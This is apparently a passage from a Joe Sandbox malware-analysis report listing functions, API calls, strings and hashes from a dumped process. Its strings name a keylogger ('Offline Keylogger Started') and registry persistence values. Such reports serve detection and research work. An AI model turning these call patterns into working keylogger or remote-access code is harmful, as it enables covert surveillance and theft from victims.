                                                                                                    • Opcode Fuzzy Hash: 4909517bb95d2f61249d5f86287d70e817a98b5eecf58a630361d829804c392b
                                                                                                    • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • Sleep.KERNELBASE(00001388), ref: 00409738
                                                                                                      • Part of subcall function 0040966D: CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                                                                                      • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                                                                                      • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                                                                                      • Part of subcall function 0040966D: CloseHandle.KERNELBASE(00000000,?,?,?,00409745), ref: 004096E6
                                                                                                    • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 00409774
                                                                                                    • GetFileAttributesW.KERNELBASE(00000000), ref: 00409785
                                                                                                    • SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 0040979C
                                                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                                                                                                      • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,?,00000000,00000000,00000000,00000000,00000000), ref: 0040991F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                    • String ID: H"G$H"G
                                                                                                    • API String ID: 3795512280-1424798214
                                                                                                    • Opcode ID: d4054b3541c9de0bb886707d1330939cd573338eb007fed7dc332b33fd2e5bf0
                                                                                                    • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                                                                                                    • Opcode Fuzzy Hash: d4054b3541c9de0bb886707d1330939cd573338eb007fed7dc332b33fd2e5bf0
                                                                                                    • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1295 4192ae-419305 call 419f23 call 411f91 call 401fc2 call 401fb8 call 4060ea 1306 419307-419316 call 411f91 1295->1306 1307 419348-419351 1295->1307 1312 41931b-419332 call 401f8b StrToIntA 1306->1312 1308 419353-419358 1307->1308 1309 41935a 1307->1309 1311 41935f-41936a call 40535d 1308->1311 1309->1311 1317 419340-419343 call 401fb8 1312->1317 1318 419334-41933d call 41accf 1312->1318 1317->1307 1318->1317
                                                                                                    APIs
                                                                                                      • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                                                                                      • Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                                                      • Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                                                      • Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                                                                                    • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                    • API String ID: 1866151309-2070987746
                                                                                                    • Opcode ID: 0802035b950ed000d9a10129efeec30dbf5645d1e0bd6e921da0c017b2021ac7
                                                                                                    • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                                                                                                    • Opcode Fuzzy Hash: 0802035b950ed000d9a10129efeec30dbf5645d1e0bd6e921da0c017b2021ac7
                                                                                                    • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1322 40966d-40967d 1323 409683-409685 1322->1323 1324 40971a-40971d 1322->1324 1325 409688-4096ae call 401ee4 CreateFileW 1323->1325 1328 4096b0-4096be GetFileSize 1325->1328 1329 4096ee 1325->1329 1330 4096c0 1328->1330 1331 4096e5-4096ec CloseHandle 1328->1331 1332 4096f1-4096f5 1329->1332 1333 4096c2-4096c8 1330->1333 1334 4096ca-4096d1 1330->1334 1331->1332 1332->1325 1335 4096f7-4096fa 1332->1335 1333->1331 1333->1334 1336 4096d3-4096d5 call 40a025 1334->1336 1337 4096da-4096df Sleep 1334->1337 1335->1324 1338 4096fc-409703 1335->1338 1336->1337 1337->1331 1338->1324 1340 409705-409715 call 408098 call 409203 1338->1340 1340->1324
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                                                                                    • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,00409745), ref: 004096E6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateHandleSizeSleep
                                                                                                    • String ID: h G
                                                                                                    • API String ID: 1958988193-3300504347
                                                                                                    • Opcode ID: 13e975a3868741cffac1d73112577800afb55aac81ce9bb8c63aa5aacad1b37c
                                                                                                    • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                                                                                                    • Opcode Fuzzy Hash: 13e975a3868741cffac1d73112577800afb55aac81ce9bb8c63aa5aacad1b37c
                                                                                                    • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1344 41a17b-41a18c 1345 41a1a4-41a1ab 1344->1345 1346 41a18e-41a191 1344->1346 1349 41a1ac-41a1c5 CreateFileW 1345->1349 1347 41a193-41a198 1346->1347 1348 41a19a-41a1a2 1346->1348 1347->1349 1348->1349 1350 41a1c7-41a1c9 1349->1350 1351 41a1cb-41a1d0 1349->1351 1354 41a209-41a20e 1350->1354 1352 41a1d2-41a1e0 SetFilePointer 1351->1352 1353 41a1eb-41a1fc WriteFile 1351->1353 1352->1353 1355 41a1e2-41a1e9 CloseHandle 1352->1355 1356 41a200-41a207 CloseHandle 1353->1356 1357 41a1fe 1353->1357 1355->1350 1356->1354 1357->1356
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,004098DF,?,00000000,00000000), ref: 0041A1D7
                                                                                                    • CloseHandle.KERNEL32(00000000,?,004098DF,?,00000000,00000000), ref: 0041A1E3
                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,004098DF,?,00000000,00000000), ref: 0041A1F4
                                                                                                    • CloseHandle.KERNELBASE(00000000,?,004098DF,?,00000000,00000000), ref: 0041A201
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 1852769593-0
                                                                                                    • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                                                                                    • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
                                                                                                    • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                                                                                    • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1358 4457a9-4457c0 GetLastError 1359 4457c2-4457cc call 445ceb 1358->1359 1360 4457ce-4457d5 call 443005 1358->1360 1359->1360 1365 44581f-445826 SetLastError 1359->1365 1364 4457da-4457e0 1360->1364 1366 4457e2 1364->1366 1367 4457eb-4457f9 call 445d41 1364->1367 1368 445828-44582d 1365->1368 1369 4457e3-4457e9 call 443c92 1366->1369 1374 4457fe-445814 call 445597 call 443c92 1367->1374 1375 4457fb-4457fc 1367->1375 1376 445816-44581d SetLastError 1369->1376 1374->1365 1374->1376 1375->1369 1376->1368
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004457AE
                                                                                                    • _free.LIBCMT ref: 004457E3
                                                                                                    • _free.LIBCMT ref: 0044580A
                                                                                                    • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445817
                                                                                                    • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445820
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                                                                                    • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                                                                                                    • Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                                                                                    • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7
                                                                                                      • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                                                      • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateThread$LocalTimewsprintf
                                                                                                    • String ID: Offline Keylogger Started
                                                                                                    • API String ID: 465354869-4114347211
                                                                                                    • Opcode ID: 4f413bfeddc20b053a911010c7dd0c78c6d83759768fb02ef20824c4023f4b57
                                                                                                    • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
                                                                                                    • Opcode Fuzzy Hash: 4f413bfeddc20b053a911010c7dd0c78c6d83759768fb02ef20824c4023f4b57
                                                                                                    • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
                                                                                                    APIs
                                                                                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041216E
                                                                                                    • RegSetValueExA.KERNELBASE(?,00464150,00000000,?,00000000,00000000,00472200,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 00412196
                                                                                                    • RegCloseKey.KERNELBASE(?,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 004121A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateValue
                                                                                                    • String ID: pth_unenc
                                                                                                    • API String ID: 1818849710-4028850238
                                                                                                    • Opcode ID: bb05d805405002c9ea24476e63677667bc427e1baa708286b474a2e763bb1422
                                                                                                    • Instruction ID: 4e2890e51e7d784523b6c6e9c9a916a8daaabc2f4381c7e0ff06ecafce147d70
                                                                                                    • Opcode Fuzzy Hash: bb05d805405002c9ea24476e63677667bc427e1baa708286b474a2e763bb1422
                                                                                                    • Instruction Fuzzy Hash: 5AF0F632100208BFCB00EFA0DD45DEE373CEF04751F104226BD09A61A2D7359E10DB94
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                                                                                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
                                                                                                    • RegCloseKey.KERNELBASE(?), ref: 00411F7D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: pth_unenc
                                                                                                    • API String ID: 3677997916-4028850238
                                                                                                    • Opcode ID: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
                                                                                                    • Instruction ID: 6ec0a72befc52f1c009cc632a5b728b25634ffaa8485c37bac66e7b8b5c78dc5
                                                                                                    • Opcode Fuzzy Hash: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
                                                                                                    • Instruction Fuzzy Hash: 31F01D7694020CBFDF109FA09C45FEE7BBCEB04B11F1041A5BA04E6191D2359A54DB94
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                                                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                                                    • RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3677997916-0
                                                                                                    • Opcode ID: bd819641beb65f800504f4ea07b1b85b9b2ddc2993f1f77fdff934dbeb1127c7
                                                                                                    • Instruction ID: 7c5a36a74d232ee299d7294234303f181ef10811f7d8c913f13e4634b011a18e
                                                                                                    • Opcode Fuzzy Hash: bd819641beb65f800504f4ea07b1b85b9b2ddc2993f1f77fdff934dbeb1127c7
                                                                                                    • Instruction Fuzzy Hash: 2D01D676900218BBCB209B95DD08DEF7F7DDB84751F000166BB05A3150DB748E46D7B8
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044C5C1
                                                                                                    • _free.LIBCMT ref: 0044C5FA
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C601
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentStrings$Free_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2716640707-0
                                                                                                    • Opcode ID: e69259ccabc5706d8b6e1bcfae6c4e2990b6796e93a71d7a5590c8599ac9f068
                                                                                                    • Instruction ID: 61e676ce0d29b6de1eff506c92a7f19814a8b40ab79c55d70c1af27fbc4e2a46
                                                                                                    • Opcode Fuzzy Hash: e69259ccabc5706d8b6e1bcfae6c4e2990b6796e93a71d7a5590c8599ac9f068
                                                                                                    • Instruction Fuzzy Hash: 2BE0EC37145A2136B1516A277C89D6F1618CFC177671A001BF00892142ED28AD0100AD
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID: P@
                                                                                                    • API String ID: 1279760036-676759640
                                                                                                    • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                                                                                    • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                                                                                                    • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                                                                                    • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 004436B8
                                                                                                      • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                                    • HeapReAlloc.KERNEL32(00000000,00000000,?,?,0000000F,00000000,00430CB7,00000000,0000000F,0042D6C1,?,?,0042F768,?,?,00000000), ref: 004436F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2447670028-0
                                                                                                    • Opcode ID: 9a7c4ca6e895fd211503ea3f448b7341845784b344d62d2fa26e59adc6ab9201
                                                                                                    • Instruction ID: 1ca59af56198d509cf9e402e21e9c8c5a276ccba14ddaf673a50935c82dc1d11
                                                                                                    • Opcode Fuzzy Hash: 9a7c4ca6e895fd211503ea3f448b7341845784b344d62d2fa26e59adc6ab9201
                                                                                                    • Instruction Fuzzy Hash: F0F062322012177AFB312E27AC05A6B37599F81F77F23412BF954A6391EA3CDA01456E
                                                                                                    APIs
                                                                                                    • socket.WS2_32(?,00000001,00000006), ref: 00404832
                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,004052EB,?,?,00000000,00000000,?,?,00000000,004051E8,?,00000000), ref: 0040486E
                                                                                                      • Part of subcall function 0040487E: WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateEventStartupsocket
                                                                                                    • String ID:
                                                                                                    • API String ID: 1953588214-0
                                                                                                    • Opcode ID: d0890d6b9dbf7aa10081a8f0c48d4e4836abc09c18ec6d90db35a2a0ad95277d
                                                                                                    • Instruction ID: 6a7ca6a32121b389846a28cffc2ecd87dee0ffbb862a0929ff73aad7f5bc5f79
                                                                                                    • Opcode Fuzzy Hash: d0890d6b9dbf7aa10081a8f0c48d4e4836abc09c18ec6d90db35a2a0ad95277d
                                                                                                    • Instruction Fuzzy Hash: 3301B1B14087809FD7349F28B8446877FE0AB15300F048D6EF1CA93BA1D3B1A444CB18
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                                                                                    • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                                                                                                    • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                                                                                    • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D
                                                                                                    APIs
                                                                                                    • getaddrinfo.WS2_32(00000000,00000000,00000000,0046FACC,00471FFC,00000000,00413BDE,00000000,00000001), ref: 00413961
                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 00413966
                                                                                                      • Part of subcall function 004137DC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                                                                                      • Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 0041386D
                                                                                                      • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                                                                                      • Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 00413894
                                                                                                      • Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 004138CC
                                                                                                      • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                                                                                      • Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                                                                                      • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 1170566393-0
                                                                                                    • Opcode ID: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
                                                                                                    • Instruction ID: 06324504dbe977c901379e35fefec32dabdef79d564ed510376fbe661015aea4
                                                                                                    • Opcode Fuzzy Hash: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
                                                                                                    • Instruction Fuzzy Hash: FFD02B723001213B9310AB5DAC01FB76B9CDFD27227050037F409C3110D7948D4147AD
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00408F39
                                                                                                      • Part of subcall function 00409203: CreateThread.KERNELBASE(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
                                                                                                      • Part of subcall function 00409203: CreateThread.KERNELBASE(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
                                                                                                      • Part of subcall function 00409203: CreateThread.KERNELBASE(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateThread$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1119755333-0
                                                                                                    • Opcode ID: a4cf6233b645aec8069e012e89874406b6158c7e2554cf9ff51d1662effb5250
                                                                                                    • Instruction ID: bde1965b6f08766bd400bb9d626b3f4fd5e121562736213e95ba31f4244dc5e2
                                                                                                    • Opcode Fuzzy Hash: a4cf6233b645aec8069e012e89874406b6158c7e2554cf9ff51d1662effb5250
                                                                                                    • Instruction Fuzzy Hash: 86218F719040899ACB09FFB5DD528EE7BB5AE51308F00003FF941722E2DE785A49DA99
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000), ref: 00443046
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                                                                                                    • Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
                                                                                                    • Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                                                                                                    • Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD
                                                                                                    APIs
                                                                                                    • WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Startup
                                                                                                    • String ID:
                                                                                                    • API String ID: 724789610-0
                                                                                                    • Opcode ID: a39f64238678d40d2918f9ecd5b136492fe542bf64fe6c2875bf53ab9f510d38
                                                                                                    • Instruction ID: a9c8eddc0db4f5dff40e6a71866b0cfb015b1534c728beba927ba249e589f683
                                                                                                    • Opcode Fuzzy Hash: a39f64238678d40d2918f9ecd5b136492fe542bf64fe6c2875bf53ab9f510d38
                                                                                                    • Instruction Fuzzy Hash: C2D0123255860C4ED610ABB4AD0F8A5775CC313A16F4003BAACB9835D3F640571CC2AB
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: send
                                                                                                    • String ID:
                                                                                                    • API String ID: 2809346765-0
                                                                                                    • Opcode ID: 01e24c4520a6d3c4395155137d096ef59c3bb50acc7407598b25046a660799bf
